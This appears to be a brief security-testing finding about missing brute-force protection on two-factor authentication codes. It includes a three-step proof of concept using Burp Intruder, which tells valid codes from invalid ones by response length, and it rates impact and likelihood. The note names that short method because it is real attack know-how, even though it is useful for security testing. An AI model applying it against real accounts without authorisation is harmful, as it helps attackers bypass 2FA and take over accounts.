V2 - Authentication
Missing brute-force protection for two-factor authentication
POC
- Send the request to Burp Intruder that requires the 2FA code
- Brute force 2-factor code parameter
- Observe difference in the length of response between correct and incorrect code
Impact
Low-Medium
Likelihood
Low